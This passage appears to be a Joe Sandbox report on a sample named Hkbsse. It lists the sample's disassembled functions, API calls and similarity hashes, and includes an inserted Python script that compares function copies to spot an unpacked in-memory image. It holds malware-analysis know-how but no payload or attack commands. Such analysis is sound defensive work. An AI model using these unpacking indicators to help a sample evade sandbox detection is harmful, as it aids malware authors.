                    • FreeLibrary.KERNEL32(00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 004366C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction ID: a844e345ecaf6b3645b807ab58af657e8cb037a566189496e486508311f4ef5d
                    • Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction Fuzzy Hash: 8EF08235501319FBCB119B91DD0EB9E7A79EB04797F104062FC04A22A1CB78CE04DB9C
                    APIs
                    • GetCPInfo.KERNEL32(02881D48,02881D48,?,7FFFFFFF,?,?,00446B05,02881D48,02881D48,?,02881D48,?,?,?,?,02881D48), ref: 004468EC
                    • __alloca_probe_16.LIBCMT ref: 004469A2
                    • __alloca_probe_16.LIBCMT ref: 00446A38
                    • __freea.LIBCMT ref: 00446AA3
                    • __freea.LIBCMT ref: 00446AAF
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea$Info
                    • String ID:
                    • API String ID: 2330168043-0
                    • Opcode ID: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction ID: 10efd5a829d972edac5f7f177fa14af3cd2182f54b741c455361477a6b2ea80f
                    • Opcode Fuzzy Hash: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction Fuzzy Hash: AD810472D006059BEF209E658841AEF7BB9EF4B714F1A401BE904B7240E779CC45CBAA
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00444D38
                    • __alloca_probe_16.LIBCMT ref: 00444DFE
                    • __freea.LIBCMT ref: 00444E6A
                      • Part of subcall function 0043B0EB: HeapAlloc.KERNEL32(00000000,?,?,?,0043E590,00000220,?,?,?,?,?,?,0043768E,?), ref: 0043B11D
                    • __freea.LIBCMT ref: 00444E73
                    • __freea.LIBCMT ref: 00444E96
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocHeap
                    • String ID:
                    • API String ID: 1096550386-0
                    • Opcode ID: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction ID: e3ec7627a5ea34dccdb9b477d1aea9347458ee8b8e155340acbb0e069fb26b32
                    • Opcode Fuzzy Hash: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction Fuzzy Hash: 1C51A372A00216AFFB215F95DC81FAB77A9EFC4764F25012BFD0497250E738DC5186A8
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00437003
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 0043705D
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00436F13,?,000000FF), ref: 004370EB
                    • __dosmaperr.LIBCMT ref: 004370F2
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0043712F
                      • Part of subcall function 00437357: __dosmaperr.LIBCMT ref: 0043738C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: 86b53b091d5339d90dada3391adf114cdc1a48250b9c16bee365c924aaea3f03
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: 6C414EB6904704ABDB389FA6DC459AFBBF9EF48300B10542EF596D3610E6389840CB55
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 044B726A
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 044B72C4
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044B717A,?,000000FF), ref: 044B7352
                    • __dosmaperr.LIBCMT ref: 044B7359
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 044B7396
                      • Part of subcall function 044B75BE: __dosmaperr.LIBCMT ref: 044B75F3
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: d577beb8d5f7a25a246786298edb7ccd40021a426b32c7a5d3bb39dee0a6c7ef
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: A7413A75900704AFDF249FA6DC459EFBBF9EF88300B10552EE896D3610EA30A941CBB1
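                    The two GetFileType blocks above carry the same Opcode ID (fd94452bb283...) but come from different memory dumps: the first from the PE-backed image at 00400000, the second from the region at 04480000 that the report marks "based on PE: false". The same pairing recurs elsewhere on this page (the ___vcrt_FlsSetValue blocks, the StructuredWorkStealingQueue blocks, the Hkbsse.exe string xrefs), and in every pair the call-site addresses differ by the same constant, 0x04080267, which is what an unrelocated second copy of the same code looks like. The script below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses function blocks in the layout shown on this page, groups them by Opcode ID, and measures the shift between copies. The FuncBlock class, the regular expressions and the field names are this example's own, and the embedded input is two blocks copied from the page.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample input: the GetFileType function as it appears in the
# PE-backed image at 00400000 and again in the non-PE-backed region at 04480000.
SAMPLE = """\
APIs
• GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00437003
• __dosmaperr.LIBCMT ref: 004370F2
Memory Dump Source
• Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
Yara matches
Similarity
• API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 1206951868-0
• Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
• Instruction ID: 86b53b091d5339d90dada3391adf114cdc1a48250b9c16bee365c924aaea3f03
• Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
• Instruction Fuzzy Hash: 6C414EB6904704ABDB389FA6DC459AFBBF9EF48300B10542EF596D3610E6389840CB55
APIs
• GetFileType.KERNEL32(?,?,00000000,00000000), ref: 044B726A
• __dosmaperr.LIBCMT ref: 044B7359
Memory Dump Source
• Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
Yara matches
Similarity
• API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 1206951868-0
• Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
• Instruction ID: d577beb8d5f7a25a246786298edb7ccd40021a426b32c7a5d3bb39dee0a6c7ef
• Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
• Instruction Fuzzy Hash: A7413A75900704AFDF249FA6DC459EFBBF9EF88300B10552EE896D3610EA30A941CBB1
"""


@dataclass
class FuncBlock:
    opcode_id: str = ""
    instruction_id: str = ""
    api_id: str = ""
    offset: int = 0           # base of the memory region the block was lifted from
    pe_backed: bool = False   # "based on PE: true" in the report
    refs: list = field(default_factory=list)  # (API name, call-site address)


# Matches "• Name.MODULE(args), ref: ADDR" and "• Name.LIB ref: ADDR"; the optional
# "Part of subcall function" prefix covers nested entries in the report.
REF_RE = re.compile(
    r"^• (?:Part of subcall function [0-9A-Fa-f]+: )?([^\s(]+)(?:\(.*\))?,? ref: ([0-9A-Fa-f]{8})$")
SRC_RE = re.compile(r"Offset: ([0-9A-Fa-f]{8}), based on PE: (true|false)")


def parse_blocks(text):
    """Split report text into FuncBlock records; a block ends at its Instruction Fuzzy Hash."""
    blocks, cur = [], FuncBlock()
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):
            continue  # section headers such as "APIs", "Yara matches", "Similarity"
        m = REF_RE.match(line)
        if m:
            cur.refs.append((m.group(1), int(m.group(2), 16)))
            continue
        key, _, value = line[2:].partition(": ")
        if key == "Source File":
            s = SRC_RE.search(value)
            if s:
                cur.offset, cur.pe_backed = int(s.group(1), 16), s.group(2) == "true"
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction ID":
            cur.instruction_id = value
        elif key == "API ID":
            cur.api_id = value
        elif key == "Instruction Fuzzy Hash":
            blocks.append(cur)
            cur = FuncBlock()
    return blocks


def shared_functions(blocks):
    """Opcode IDs seen in more than one memory region, i.e. the same code at two bases."""
    by_id = defaultdict(list)
    for b in blocks:
        by_id[b.opcode_id].append(b)
    return {oid: bs for oid, bs in by_id.items() if len({b.offset for b in bs}) > 1}


def copy_delta(a, b):
    """Shift between two copies of one function, taken from the first API call they share.
    The same delta across many pairs means region b holds an unrelocated copy of a's code."""
    names = {name: addr for name, addr in a.refs}
    for name, addr in b.refs:
        if name in names:
            return addr - names[name]
    return None


def report(text):
    """(opcode id prefix, PE-backed base, other base, delta) for each function present in both."""
    out = []
    for oid, bs in shared_functions(parse_blocks(text)).items():
        pe = [b for b in bs if b.pe_backed]
        other = [b for b in bs if not b.pe_backed]
        if pe and other:
            out.append((oid[:12], pe[0].offset, other[0].offset, copy_delta(pe[0], other[0])))
    return out


if __name__ == "__main__":
    for oid, base, other, delta in report(SAMPLE):
        print(f"{oid}... at {base:08X} (PE) and {other:08X} (not PE-backed), delta {delta:#x}")
```

                    Run against the full report text, the script lists every function that exists both in the mapped image and in a region with no PE backing; a single constant delta across all pairs points at one in-memory copy of the image, whereas varying deltas would indicate separately written code. Pairing this with the Instruction IDs (which differ between the copies because the embedded addresses differ) gives a quick way to separate the original image from the unpacked one before loading either into a disassembler.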
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DC75
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DCD4
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DCFA
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DD1A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042DD67
                      • Part of subcall function 00431440: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction ID: 63ebb2224078d8bdd719b4d667a60a5c8aa541c12ffbf131e152555adb9a5383
                    • Opcode Fuzzy Hash: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction Fuzzy Hash: 464126B0B00220ABDF19AB25E886BFEBB64AF45314F44409FE4065B382CF789D45C7D9
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0449F064
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0449F08E
                      • Part of subcall function 0449F754: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0449F771
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0449F10B
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0449F13D
                    • __freea.LIBCMT ref: 0449F163
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                    • String ID:
                    • API String ID: 2497068736-0
                    • Opcode ID: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction ID: c803ebc2acb9b68a54f1c1ed7ea5fa91d2e7e81e75593434c22ac7734d66df84
                    • Opcode Fuzzy Hash: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction Fuzzy Hash: 28317E71A002069BDF14DFA8C8416AEBBF9AF49314F25406FD505E7381DB74AD0ADB94
                    APIs
                    • _SpinWait.LIBCONCRT ref: 004287FE
                      • Part of subcall function 0041EBE0: _SpinWait.LIBCONCRT ref: 0041EBF8
                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428812
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428844
                    • List.LIBCMT ref: 004288C7
                    • List.LIBCMT ref: 004288D6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                    • String ID:
                    • API String ID: 3281396844-0
                    • Opcode ID: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction ID: 2a559f85231c331ddd4a9ce77051960e3928693ad3a01cc98d84397cd5210c7c
                    • Opcode Fuzzy Hash: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction Fuzzy Hash: 42318A32E02625DFCB14EFA5E5516EDB7B0BF14308F84406FD80127242DB396D04CB99
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044A7727
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044A7769
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 044A7785
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 044A7790
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044A77B7
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 3897347962-0
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: 9ec6f312166188fe342cbd2480aa4b30f5cf8d8db02a0fce7c49296492e5b494
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: D0219438A00208AFDF14EF65C584AAE7BB5BF14358F1440AAD901973A1DB34FE15CF90
                    APIs
                    • _free.LIBCMT ref: 0043F0F5
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F107
                    • _free.LIBCMT ref: 0043F119
                    • _free.LIBCMT ref: 0043F12B
                    • _free.LIBCMT ref: 0043F13D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: 20cc99717a647c86e6a84bdeed4021dc3f5e7d0ecd55b80566e61f4c1914feb2
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: EBF04432944710ABC925EB55FA82C0B73E9EA48314F68282FF058D7601DB7CFC44466D
                    APIs
                    • _free.LIBCMT ref: 044BF35C
                      • Part of subcall function 044BB0FC: HeapFree.KERNEL32(00000000,00000000,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?), ref: 044BB112
                      • Part of subcall function 044BB0FC: GetLastError.KERNEL32(?,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?,?), ref: 044BB124
                    • _free.LIBCMT ref: 044BF36E
                    • _free.LIBCMT ref: 044BF380
                    • _free.LIBCMT ref: 044BF392
                    • _free.LIBCMT ref: 044BF3A4
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: c9980ef2693cb12544958a55a59c183edd96113da92e0ce41ca0cf1d8edbfc7d
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: 11F04F32604B00FB9E30EB5AEA81C9B73D9EB00315754580AE09CD7A20CFB0F88086B4
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402806
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 004028A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: P#@$P#@
                    • API String ID: 2970364248-3974838576
                    • Opcode ID: 04bb84ff4b4bae0cfb47b6af8ba6911b054a7e0b36e17a04bde3e3e5af0a576f
                    • Instruction ID: d07b1476e1c9369c34cdbbae878fc5af4d4488366f6001985d65a31c5cb34ac4
                    • Opcode Fuzzy Hash: 04bb84ff4b4bae0cfb47b6af8ba6911b054a7e0b36e17a04bde3e3e5af0a576f
                    • Instruction Fuzzy Hash: D4719471E002089BDB04DF98C985BDDFBB4EF49314F14822EE815B7381D778A984CBA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: a3f27f88263ce3e1505ace8c85f3ecc3a08bb576eb7af5fa0352c1f383531ab9
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: D4617BB1E002199FDB14CFA9D8815AEFBF5EF4C310F2591AAE805E7300D678AE418B94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: 04b6ccf11bd173ae16ac29a83a70894d7adb7a498232175ba1018adbcfea1511
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: FA613EB5E006199FDF24CFA9C8805EEFBF5EF48314B1581AAD895E7300D675AE418BA0
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 004427FC
                    • _free.LIBCMT ref: 004427EA
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 004429B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE
                    • API String ID: 2155170405-2984570469
                    • Opcode ID: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction ID: 4144492f74be2ab261ac73441af81b9bed5bd636e8574888bf5b0065352f6d8b
                    • Opcode Fuzzy Hash: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction Fuzzy Hash: 5F512971D00215ABEB10FF668E819AE77BCAF44354F5102AFF510E3291EBF89E418B59
                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00435791
                    • CatchIt.LIBVCRUNTIME ref: 00435877
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction ID: f89fec4cce6058aad9e99e0a1a778d616f5fcef55721b1fb97097d1a833b2b70
                    • Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction Fuzzy Hash: C9417C71900609EFCF19EF94CD81AEEBBB5FF48304F14905AF90567251D3399A60DB94
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B53
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00403B59
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B62
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                    • String ID: pB@
                    • API String ID: 3308344742-522444117
                    • Opcode ID: 08c114375f5cdfcca0cd6b1a8b7b910a1d641b5675fb53afd59ab823612154f1
                    • Instruction ID: 9fa57e067fa2e57eae0d05727bcb9931675f6d872009e7436c3174976e3d59b0
                    • Opcode Fuzzy Hash: 08c114375f5cdfcca0cd6b1a8b7b910a1d641b5675fb53afd59ab823612154f1
                    • Instruction Fuzzy Hash: 1F31E571600B009FD7248F29C889B66BBE9EF44725F04466EE95ACB391D73CED00CB94
                    APIs
                    • List.LIBCONCRT ref: 0042AFFA
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B01F
                    • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042B05E
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                    • String ID: pExecutionResource
                    • API String ID: 1772865662-359481074
                    • Opcode ID: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction ID: b773aba9d63d3202b0a560684f2aba75f81d395c910e5e66aad4bd489bcccfa2
                    • Opcode Fuzzy Hash: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction Fuzzy Hash: 5F21B9B5B402159BCB08EF65C881BED77A1BF48304F50402FF90567392DBB8AE45CB99
                    APIs
                    • SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00445052
                    • _free.LIBCMT ref: 00445061
                    • _free.LIBCMT ref: 00445070
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable
